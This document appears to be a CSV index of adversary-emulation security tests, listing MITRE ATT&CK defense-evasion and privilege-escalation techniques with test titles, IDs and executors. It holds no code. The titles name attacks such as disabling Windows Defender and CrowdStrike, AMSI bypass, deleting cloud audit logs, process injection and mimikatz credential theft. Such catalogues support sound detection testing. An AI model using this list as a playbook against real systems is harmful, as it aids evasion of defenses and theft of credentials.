defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,16,Tamper with Windows Defender ATP PowerShell,6b8df440-51ec-4d53-bf83-899591c9b5d7,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,17,Tamper with Windows Defender Command Prompt,aa875ed4-8935-47e2-b2c5-6ec00ab220d2,command_prompt
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,18,Tamper with Windows Defender Registry,1b3e0146-a1e5-4c5c-89fb-1bb2ffe8fc45,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,19,Disable Microsoft Office Security Features,6f5fb61b-4e56-4a3d-a8c3-82e13686c6d7,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,20,Remove Windows Defender Definition Files,3d47daaa-2f56-43e0-94cc-caf5d8d52a68,command_prompt
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,21,Stop and Remove Arbitrary Security Windows Service,ae753dda-0f15-4af6-a168-b9ba16143143,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,22,Uninstall Crowdstrike Falcon on Windows,b32b1ccf-f7c1-49bc-9ddd-7d7466a7b297,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,23,Tamper with Windows Defender Evade Scanning -Folder,0b19f4ee-de90-4059-88cb-63c800c683ed,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,24,Tamper with Windows Defender Evade Scanning -Extension,315f4be6-2240-4552-b3e1-d1047f5eecea,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,25,Tamper with Windows Defender Evade Scanning -Process,a123ce6a-3916-45d6-ba9c-7d4081315c27,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,26,office-365-Disable-AntiPhishRule,b9bbae2c-2ba6-4cf3-b452-8e8f908696f3,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,27,Disable Windows Defender with DISM,871438ac-7d6e-432a-b27d-3e7db69faf58,command_prompt
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,28,Disable Defender Using NirSoft AdvancedRun,81ce22fd-9612-4154-918e-8a1f285d214d,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,29,Kill antimalware protected processes using Backstab,24a12b91-05a7-4deb-8d7f-035fa98591bc,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,30,WinPwn - Kill the event log services for stealth,7869d7a3-3a30-4d2c-a5d2-f1cd9c34ce66,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,31,Tamper with Windows Defender ATP using Aliases - PowerShell,c531aa6e-9c97-4b29-afee-9b7be6fc8a64,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,32,LockBit Black - Disable Privacy Settings Experience Using Registry -cmd,d6d22332-d07d-498f-aea0-6139ecb7850e,command_prompt
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,33,LockBit Black - Use Registry Editor to turn on automatic logon -cmd,9719d0e1-4fe0-4b2e-9a72-7ad3ee8ddc70,command_prompt
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,34,LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell,d8c57eaa-497a-4a08-961e-bd5efd7c9374,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,35,Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell,5e27f36d-5132-4537-b43b-413b0d5eec9a,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,36,Disable Windows Defender with PwSh Disable-WindowsOptionalFeature,f542ffd3-37b4-4528-837f-682874faa012,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,37,WMIC Tamper with Windows Defender Evade Scanning Folder,59d386fc-3a4b-41b8-850d-9e3eee24dfe4,command_prompt
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,38,Delete Windows Defender Scheduled Tasks,4b841aa1-0d05-4b32-bbe7-7564346e7c76,command_prompt
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,39,Clear History,23b88394-091b-4968-a42d-fb8076992443,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,40,Suspend History,94f6a1c9-aae7-46a4-9083-2bb1f5768ec4,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,41,Reboot Linux Host via Kernel System Request,6d6d3154-1a52-4d1a-9d51-92ab8148b32e,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,42,Clear Pagging Cache,f790927b-ea85-4a16-b7b2-7eb44176a510,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,43,Disable Memory Swap,e74e4c63-6fde-4ad2-9ee8-21c3a1733114,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,44,Disable Hypervisor-Enforced Code Integrity (HVCI),70bd71e6-eba4-4e00-92f7-617911dbe020,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,45,AMSI Bypass - Override AMSI via COM,17538258-5699-4ff1-92d1-5ac9b0dc21f5,command_prompt
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,46,AWS - GuardDuty Suspension or Deletion,11e65d8d-e7e4-470e-a3ff-82bc56ad938e,bash
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,47,Tamper with Defender ATP on Linux/MacOS,40074085-dbc8-492b-90a3-11bcfc52fda8,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,48,Tamper with Windows Defender Registry - Reg.exe,1f6743da-6ecc-4a93-b03f-dc357e4b313f,command_prompt
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,49,Tamper with Windows Defender Registry - Powershell,a72cfef8-d252-48b3-b292-635d332625c3,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,50,ESXi - Disable Account Lockout Policy via PowerCLI,091a6290-cd29-41cb-81ea-b12f133c66cb,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,51,Delete Microsoft Defender ASR Rules - InTune,eea0a6c2-84e9-4e8c-a242-ac585d28d0d1,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,52,Delete Microsoft Defender ASR Rules - GPO,0e7b8a4b-2ca5-4743-a9f9-96051abb6e50,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,53,AMSI Bypass - Create AMSIEnable Reg Key,728eca7b-0444-4f6f-ac36-437e3d751dc0,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,54,Disable EventLog-Application Auto Logger Session Via Registry - Cmd,653c6e17-14a2-4849-851d-f1c0cc8ea9ab,command_prompt
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,55,Disable EventLog-Application Auto Logger Session Via Registry - PowerShell,da86f239-9bd3-4e85-92ed-4a94ef111a1c,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,56,Disable EventLog-Application ETW Provider Via Registry - Cmd,1cac9b54-810e-495c-8aac-989e0076583b,command_prompt
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,57,Disable EventLog-Application ETW Provider Via Registry - PowerShell,8f907648-1ebf-4276-b0f0-e2678ca474f0,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,58,Freeze PPL-protected process with EDR-Freeze,cbb2573a-a6ad-4c87-aef8-6e175598559b,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,59,Disable ASLR Via sysctl parameters - Linux,ac333fe1-ce2b-400b-a117-538634427439,bash
defense-evasion,T1055.012,Process Injection: Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
defense-evasion,T1055.012,Process Injection: Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
defense-evasion,T1055.012,Process Injection: Process Hollowing,3,Process Hollowing in Go using CreateProcessW WinAPI,c8f98fe1-c89b-4c49-a7e3-d60ee4bc2f5a,powershell
defense-evasion,T1055.012,Process Injection: Process Hollowing,4,Process Hollowing in Go using CreateProcessW and CreatePipe WinAPIs (T1055.012),94903cc5-d462-498a-b919-b1e5ab155fee,powershell
defense-evasion,T1027,Obfuscated Files or Information,1,Decode base64 Data into Script,f45df6be-2e1e-4136-a384-8f18ab3826fb,sh
defense-evasion,T1027,Obfuscated Files or Information,2,Execute base64-encoded PowerShell,a50d5a97-2531-499e-a1de-5544c74432c6,powershell
defense-evasion,T1027,Obfuscated Files or Information,3,Execute base64-encoded PowerShell from Windows Registry,450e7218-7915-4be4-8b9b-464a49eafcec,powershell
defense-evasion,T1027,Obfuscated Files or Information,4,Execution from Compressed File,f8c8a909-5f29-49ac-9244-413936ce6d1f,command_prompt
defense-evasion,T1027,Obfuscated Files or Information,5,DLP Evasion via Sensitive Data in VBA Macro over email,129edb75-d7b8-42cd-a8ba-1f3db64ec4ad,powershell
defense-evasion,T1027,Obfuscated Files or Information,6,DLP Evasion via Sensitive Data in VBA Macro over HTTP,e2d85e66-cb66-4ed7-93b1-833fc56c9319,powershell
defense-evasion,T1027,Obfuscated Files or Information,7,Obfuscated Command in PowerShell,8b3f4ed6-077b-4bdd-891c-2d237f19410f,powershell
defense-evasion,T1027,Obfuscated Files or Information,8,Obfuscated Command Line using special Unicode characters,e68b945c-52d0-4dd9-a5e8-d173d70c448f,manual
defense-evasion,T1027,Obfuscated Files or Information,9,Snake Malware Encrypted crmlog file,7e47ee60-9dd1-4269-9c4f-97953b183268,powershell
defense-evasion,T1027,Obfuscated Files or Information,10,Execution from Compressed JScript File,fad04df1-5229-4185-b016-fb6010cd87ac,command_prompt
defense-evasion,T1564.006,Run Virtual Instance,1,Register Portable Virtualbox,c59f246a-34f8-4e4d-9276-c295ef9ba0dd,command_prompt
defense-evasion,T1564.006,Run Virtual Instance,2,Create and start VirtualBox virtual machine,88b81702-a1c0-49a9-95b2-2dd53d755767,command_prompt
defense-evasion,T1564.006,Run Virtual Instance,3,Create and start Hyper-V virtual machine,fb8d4d7e-f5a4-481c-8867-febf13f8b6d3,powershell
defense-evasion,T1134.005,Access Token Manipulation: SID-History Injection,1,Injection SID-History with mimikatz,6bef32e5-9456-4072-8f14-35566fb85401,command_prompt
defense-evasion,T1218.010,Signed Binary Proxy Execution: Regsvr32,1,Regsvr32 local COM scriptlet execution,449aa403-6aba-47ce-8a37-247d21ef0306,command_prompt
defense-evasion,T1218.010,Signed Binary Proxy Execution: Regsvr32,2,Regsvr32 remote COM scriptlet execution,c9d0c4ef-8a96-4794-a75b-3d3a5e6f2a36,command_prompt
defense-evasion,T1218.010,Signed Binary Proxy Execution: Regsvr32,3,Regsvr32 local DLL execution,08ffca73-9a3d-471a-aeb0-68b4aa3ab37b,command_prompt
defense-evasion,T1218.010,Signed Binary Proxy Execution: Regsvr32,4,Regsvr32 Registering Non DLL,1ae5ea1f-0a4e-4e54-b2f5-4ac328a7f421,command_prompt
defense-evasion,T1218.010,Signed Binary Proxy Execution: Regsvr32,5,Regsvr32 Silent DLL Install Call DllRegisterServer,9d71c492-ea2e-4c08-af16-c6994cdf029f,command_prompt
defense-evasion,T1036.003,Masquerading: Rename System Utilities,1,Masquerading as Windows LSASS process,5ba5a3d1-cf3c-4499-968a-a93155d1f717,command_prompt
defense-evasion,T1036.003,Masquerading: Rename System Utilities,2,Masquerading as FreeBSD or Linux crond process.,a315bfff-7a98-403b-b442-2ea1b255e556,sh
defense-evasion,T1036.003,Masquerading: Rename System Utilities,3,Masquerading - cscript.exe running as notepad.exe,3a2a578b-0a01-46e4-92e3-62e2859b42f0,command_prompt
defense-evasion,T1036.003,Masquerading: Rename System Utilities,4,Masquerading - wscript.exe running as svchost.exe,24136435-c91a-4ede-9da1-8b284a1c1a23,command_prompt
defense-evasion,T1036.003,Masquerading: Rename System Utilities,5,Masquerading - powershell.exe running as taskhostw.exe,ac9d0fc3-8aa8-4ab5-b11f-682cd63b40aa,command_prompt
defense-evasion,T1036.003,Masquerading: Rename System Utilities,6,Masquerading - non-windows exe running as windows exe,bc15c13f-d121-4b1f-8c7d-28d95854d086,powershell
defense-evasion,T1036.003,Masquerading: Rename System Utilities,7,Masquerading - windows exe running as different windows exe,c3d24a39-2bfe-4c6a-b064-90cd73896cb0,powershell
defense-evasion,T1036.003,Masquerading: Rename System Utilities,8,Malicious process Masquerading as LSM.exe,83810c46-f45e-4485-9ab6-8ed0e9e6ed7f,command_prompt
defense-evasion,T1574.009,Hijack Execution Flow: Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt
defense-evasion,T1218.009,Signed Binary Proxy Execution: Regsvcs/Regasm,1,Regasm Uninstall Method Call Test,71bfbfac-60b1-4fc0-ac8b-2cedbbdcb112,command_prompt
defense-evasion,T1218.009,Signed Binary Proxy Execution: Regsvcs/Regasm,2,Regsvcs Uninstall Method Call Test,fd3c1c6a-02d2-4b72-82d9-71c527abb126,powershell
defense-evasion,T1553.004,Subvert Trust Controls: Install Root Certificate,1,Install root CA on CentOS/RHEL,9c096ec4-fd42-419d-a762-d64cc950627e,sh
defense-evasion,T1553.004,Subvert Trust Controls: Install Root Certificate,2,Install root CA on FreeBSD,f4568003-1438-44ab-a234-b3252ea7e7a3,sh
defense-evasion,T1553.004,Subvert Trust Controls: Install Root Certificate,3,Install root CA on Debian/Ubuntu,53bcf8a0-1549-4b85-b919-010c56d724ff,sh
defense-evasion,T1553.004,Subvert Trust Controls: Install Root Certificate,4,Install root CA on macOS,cc4a0b8c-426f-40ff-9426-4e10e5bf4c49,sh
defense-evasion,T1553.004,Subvert Trust Controls: Install Root Certificate,5,Install root CA on Windows,76f49d86-5eb1-461a-a032-a480f86652f1,powershell
defense-evasion,T1553.004,Subvert Trust Controls: Install Root Certificate,6,Install root CA on Windows with certutil,5fdb1a7a-a93c-4fbe-aa29-ddd9ef94ed1f,powershell
defense-evasion,T1553.004,Subvert Trust Controls: Install Root Certificate,7,Add Root Certificate to CurrentUser Certificate Store,ca20a3f1-42b5-4e21-ad3f-1049199ec2e0,powershell
defense-evasion,T1027.004,Obfuscated Files or Information: Compile After Delivery,1,Compile After Delivery using csc.exe,ffcdbd6a-b0e8-487d-927a-09127fe9a206,command_prompt
defense-evasion,T1027.004,Obfuscated Files or Information: Compile After Delivery,2,Dynamic C# Compile,453614d8-3ba6-4147-acc0-7ec4b3e1faef,powershell
defense-evasion,T1027.004,Obfuscated Files or Information: Compile After Delivery,3,C compile,d0377aa6-850a-42b2-95f0-de558d80be57,sh
defense-evasion,T1027.004,Obfuscated Files or Information: Compile After Delivery,4,CC compile,da97bb11-d6d0-4fc1-b445-e443d1346efe,sh
defense-evasion,T1027.004,Obfuscated Files or Information: Compile After Delivery,5,Go compile,78bd3fa7-773c-449e-a978-dc1f1500bc52,sh
defense-evasion,T1197,BITS Jobs,1,Bitsadmin Download (cmd),3c73d728-75fb-4180-a12f-6712864d7421,command_prompt
defense-evasion,T1197,BITS Jobs,2,Bitsadmin Download (PowerShell),f63b8bc4-07e5-4112-acba-56f646f3f0bc,powershell
defense-evasion,T1197,BITS Jobs,3,"Persist, Download, & Execute",62a06ec5-5754-47d2-bcfc-123d8314c6ae,command_prompt
defense-evasion,T1197,BITS Jobs,4,Bits download using desktopimgdownldr.exe (cmd),afb5e09e-e385-4dee-9a94-6ee60979d114,command_prompt
defense-evasion,T1127.001,Trusted Developer Utilities Proxy Execution: MSBuild,1,MSBuild Bypass Using Inline Tasks (C#),58742c0f-cb01-44cd-a60b-fb26e8871c93,command_prompt
defense-evasion,T1127.001,Trusted Developer Utilities Proxy Execution: MSBuild,2,MSBuild Bypass Using Inline Tasks (VB),ab042179-c0c5-402f-9bc8-42741f5ce359,command_prompt
defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,1,AWS - CloudTrail Changes,9c10dc6b-20bd-403a-8e67-50ef7d07ed4e,sh
defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,2,Azure - Eventhub Deletion,5e09bed0-7d33-453b-9bf3-caea32bff719,powershell
defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,3,Office 365 - Exchange Audit Log Disabled,1ee572f3-056c-4632-a7fc-7e7c42b1543c,powershell
defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,4,AWS - Disable CloudTrail Logging Through Event Selectors using Stratus,a27418de-bdce-4ebd-b655-38f11142bf0c,sh
defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,5,AWS - CloudTrail Logs Impairment Through S3 Lifecycle Rule using Stratus,22d89a2f-d475-4895-b2d4-68626d49c029,sh
defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,6,AWS - Remove VPC Flow Logs using Stratus,93c150f5-ad7b-4ee3-8992-df06dec2ac79,sh
defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,7,AWS - CloudWatch Log Group Deletes,89422c87-b57b-4a04-a8ca-802bb9d06121,sh
defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,8,AWS CloudWatch Log Stream Deletes,33ca84bc-4259-4943-bd36-4655dc420932,sh
defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,9,Office 365 - Set Audit Bypass For a Mailbox,c9a2f6fe-7197-488c-af6d-10c782121ca6,powershell
defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,10,GCP - Delete Activity Event Log,d56152ec-01d9-42a2-877c-aac1f6ebe8e6,sh
defense-evasion,T1564.003,Hide Artifacts: Hidden Window,1,Hidden Window,f151ee37-9e2b-47e6-80e4-550b9f999b7a,powershell
defense-evasion,T1564.003,Hide Artifacts: Hidden Window,2,Headless Browser Accessing Mockbin,0ad9ab92-c48c-4f08-9b20-9633277c4646,command_prompt
defense-evasion,T1564.003,Hide Artifacts: Hidden Window,3,Hidden Window-Conhost Execution,5510d22f-2595-4911-8456-4d630c978616,powershell
defense-evasion,T1027.006,HTML Smuggling,1,HTML Smuggling Remote Payload,30cbeda4-08d9-42f1-8685-197fad677734,powershell
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,1,Delete a single file - FreeBSD/Linux/macOS,562d737f-2fc6-4b09-8c2a-7f8ff0828480,sh
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,2,Delete an entire folder - FreeBSD/Linux/macOS,a415f17e-ce8d-4ce2-a8b4-83b674e7017e,sh
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,3,Overwrite and delete a file with shred,039b4b10-2900-404b-b67f-4b6d49aa6499,sh
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,4,Delete a single file - Windows cmd,861ea0b4-708a-4d17-848d-186c9c7f17e3,command_prompt
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,5,Delete an entire folder - Windows cmd,ded937c4-2add-42f7-9c2c-c742b7a98698,command_prompt
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,6,Delete a single file - Windows PowerShell,9dee89bd-9a98-4c4f-9e2d-4256690b0e72,powershell
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,7,Delete an entire folder - Windows PowerShell,edd779e4-a509-4cba-8dfa-a112543dbfb1,powershell
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,8,Delete Filesystem - Linux,f3aa95fe-4f10-4485-ad26-abf22a764c52,sh
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,9,Delete Prefetch File,36f96049-0ad7-4a5f-8418-460acaeb92fb,powershell
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,10,Delete TeamViewer Log Files,69f50a5f-967c-4327-a5bb-e1a9a9983785,powershell
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,11,Clears Recycle bin via rd,f723d13d-48dc-4317-9990-cf43a9ac0bf2,command_prompt
defense-evasion,T1221,Template Injection,1,WINWORD Remote Template Injection,1489e08a-82c7-44ee-b769-51b72d03521d,command_prompt
defense-evasion,T1027.002,Obfuscated Files or Information: Software Packing,1,Binary simply packed by UPX (linux),11c46cd8-e471-450e-acb8-52a1216ae6a4,sh
defense-evasion,T1027.002,Obfuscated Files or Information: Software Packing,2,"Binary packed by UPX, with modified headers (linux)",f06197f8-ff46-48c2-a0c6-afc1b50665e1,sh
defense-evasion,T1027.002,Obfuscated Files or Information: Software Packing,3,Binary simply packed by UPX,b16ef901-00bb-4dda-b4fc-a04db5067e20,sh
defense-evasion,T1027.002,Obfuscated Files or Information: Software Packing,4,"Binary packed by UPX, with modified headers",4d46e16b-5765-4046-9f25-a600d3e65e4d,sh
defense-evasion,T1622,Debugger Evasion,1,Detect a Debugger Presence in the Machine,58bd8c8d-3a1a-4467-a69c-439c75469b07,powershell
defense-evasion,T1036.006,Masquerading: Space after Filename,1,Space After Filename (Manual),89a7dd26-e510-4c9f-9b15-f3bae333360f,manual
defense-evasion,T1036.006,Masquerading: Space after Filename,2,Space After Filename,b95ce2eb-a093-4cd8-938d-5258cef656ea,sh
defense-evasion,T1550.002,Use Alternate Authentication Material: Pass the Hash,1,Mimikatz Pass the Hash,ec23cef9-27d9-46e4-a68d-6f75f7b86908,command_prompt
defense-evasion,T1550.002,Use Alternate Authentication Material: Pass the Hash,2,crackmapexec Pass the Hash,eb05b028-16c8-4ad8-adea-6f5b219da9a9,command_prompt
defense-evasion,T1550.002,Use Alternate Authentication Material: Pass the Hash,3,Invoke-WMIExec Pass the Hash,f8757545-b00a-4e4e-8cfb-8cfb961ee713,powershell
defense-evasion,T1027.007,Obfuscated Files or Information: Dynamic API Resolution,1,Dynamic API Resolution-Ninja-syscall,578025d5-faa9-4f6d-8390-aae739d507e1,powershell
defense-evasion,T1055.015,Process Injection: ListPlanting,1,Process injection ListPlanting,4f3c7502-b111-4dfe-8a6e-529307891a59,powershell
defense-evasion,T1220,XSL Script Processing,1,MSXSL Bypass using local files,ca23bfb2-023f-49c5-8802-e66997de462d,command_prompt
defense-evasion,T1220,XSL Script Processing,2,MSXSL Bypass using remote files,a7c3ab07-52fb-49c8-ab6d-e9c6d4a0a985,command_prompt
defense-evasion,T1220,XSL Script Processing,3,WMIC bypass using local XSL file,1b237334-3e21-4a0c-8178-b8c996124988,command_prompt
defense-evasion,T1220,XSL Script Processing,4,WMIC bypass using remote XSL file,7f5be499-33be-4129-a560-66021f379b9b,command_prompt
defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,1,Create a hidden file in a hidden directory,61a782e5-9a19-40b5-8ba4-69a4b9f3d7be,sh
defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,2,Mac Hidden file,cddb9098-3b47-4e01-9d3b-6f5f323288a9,sh
defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,3,Create Windows System File with Attrib,f70974c8-c094-4574-b542-2c545af95a32,command_prompt
defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,4,Create Windows Hidden File with Attrib,dadb792e-4358-4d8d-9207-b771faa0daa5,command_prompt
defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,5,Hidden files,3b7015f2-3144-4205-b799-b05580621379,sh
defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,6,Hide a Directory,b115ecaf-3b24-4ed2-aefe-2fcb9db913d3,sh
defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,7,Show all hidden files,9a1ec7da-b892-449f-ad68-67066d04380c,sh
defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,8,Hide Files Through Registry,f650456b-bd49-4bc1-ae9d-271b5b9581e7,command_prompt
defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,9,Create Windows Hidden File with powershell,7f66d539-4fbe-4cfa-9a56-4a2bf660c58a,powershell
defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,10,Create Windows System File with powershell,d380c318-0b34-45cb-9dad-828c11891e43,powershell
defense-evasion,T1578.001,Modify Cloud Compute Infrastructure: Create Snapshot,1,AWS - Create Snapshot from EBS Volume,a3c09662-85bb-4ea8-b15b-6dc8a844e236,sh
defense-evasion,T1578.001,Modify Cloud Compute Infrastructure: Create Snapshot,2,Azure - Create Snapshot from Managed Disk,89e69b4b-3458-4ec6-b819-b3008debc1bc,sh
defense-evasion,T1578.001,Modify Cloud Compute Infrastructure: Create Snapshot,3,GCP - Create Snapshot from Persistent Disk,e6fbc036-91e7-4ad3-b9cb-f7210f40dd5d,sh
defense-evasion,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
defense-evasion,T1078.004,Valid Accounts: Cloud Accounts,2,Azure Persistence Automation Runbook Created or Modified,348f4d14-4bd3-4f6b-bd8a-61237f78b3ac,powershell
defense-evasion,T1078.004,Valid Accounts: Cloud Accounts,3,GCP - Create Custom IAM Role,3a159042-69e6-4398-9a69-3308a4841c85,sh
defense-evasion,T1564.004,Hide Artifacts: NTFS File Attributes,1,Alternate Data Streams (ADS),8822c3b0-d9f9-4daf-a043-49f4602364f4,command_prompt
defense-evasion,T1564.004,Hide Artifacts: NTFS File Attributes,2,Store file in Alternate Data Stream (ADS),2ab75061-f5d5-4c1a-b666-ba2a50df5b02,powershell
defense-evasion,T1564.004,Hide Artifacts: NTFS File Attributes,3,Create ADS command prompt,17e7637a-ddaf-4a82-8622-377e20de8fdb,command_prompt
defense-evasion,T1564.004,Hide Artifacts: NTFS File Attributes,4,Create ADS PowerShell,0045ea16-ed3c-4d4c-a9ee-15e44d1560d1,powershell
defense-evasion,T1564.004,Hide Artifacts: NTFS File Attributes,5,Create Hidden Directory via $index_allocation,3e6791e7-232c-481c-a680-a52f86b83fdf,command_prompt
defense-evasion,T1055.001,Process Injection: Dynamic-link Library Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell
defense-evasion,T1055.001,Process Injection: Dynamic-link Library Injection,2,WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique,8b56f787-73d9-4f1d-87e8-d07e89cbc7f5,powershell
defense-evasion,T1216,Signed Script Proxy Execution,1,SyncAppvPublishingServer Signed Script PowerShell Command Execution,275d963d-3f36-476c-8bef-a2a3960ee6eb,command_prompt
defense-evasion,T1216,Signed Script Proxy Execution,2,manage-bde.wsf Signed Script Command Execution,2a8f2d3c-3dec-4262-99dd-150cb2a4d63a,command_prompt
defense-evasion,T1078.003,Valid Accounts: Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
defense-evasion,T1078.003,Valid Accounts: Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
defense-evasion,T1078.003,Valid Accounts: Local Accounts,3,Create local account with admin privileges using sysadminctl utility - MacOS,191db57d-091a-47d5-99f3-97fde53de505,bash
defense-evasion,T1078.003,Valid Accounts: Local Accounts,4,Enable root account using dsenableroot utility - MacOS,20b40ea9-0e17-4155-b8e6-244911a678ac,bash
defense-evasion,T1078.003,Valid Accounts: Local Accounts,5,Add a new/existing user to the admin group using dseditgroup utility - macOS,433842ba-e796-4fd5-a14f-95d3a1970875,bash
defense-evasion,T1078.003,Valid Accounts: Local Accounts,6,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
defense-evasion,T1078.003,Valid Accounts: Local Accounts,7,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
defense-evasion,T1078.003,Valid Accounts: Local Accounts,8,Create local account (Linux),02a91c34-8a5b-4bed-87af-501103eb5357,bash
defense-evasion,T1078.003,Valid Accounts: Local Accounts,9,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
defense-evasion,T1078.003,Valid Accounts: Local Accounts,10,Reactivate a locked/expired account (FreeBSD),09e3380a-fae5-4255-8b19-9950be0252cf,sh
defense-evasion,T1078.003,Valid Accounts: Local Accounts,11,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
defense-evasion,T1078.003,Valid Accounts: Local Accounts,12,Login as nobody (freebsd),16f6374f-7600-459a-9b16-6a88fd96d310,sh
defense-evasion,T1078.003,Valid Accounts: Local Accounts,13,Use PsExec to elevate to NT Authority\SYSTEM account,6904235f-0f55-4039-8aed-41c300ff7733,command_prompt
defense-evasion,T1127,Trusted Developer Utilities Proxy Execution,1,Lolbin Jsc.exe compile javascript to exe,1ec1c269-d6bd-49e7-b71b-a461f7fa7bc8,command_prompt
defense-evasion,T1127,Trusted Developer Utilities Proxy Execution,2,Lolbin Jsc.exe compile javascript to dll,3fc9fea2-871d-414d-8ef6-02e85e322b80,command_prompt
defense-evasion,T1574.012,Hijack Execution Flow: COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
defense-evasion,T1574.012,Hijack Execution Flow: COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
defense-evasion,T1574.012,Hijack Execution Flow: COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
privilege-escalation,T1055.011,Process Injection: Extra Window Memory Injection,1,Process Injection via Extra Window Memory (EWM) x64 executable,93ca40d2-336c-446d-bcef-87f14d438018,powershell
privilege-escalation,T1053.005,Scheduled Task/Job: Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt
privilege-escalation,T1053.005,Scheduled Task/Job: Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt
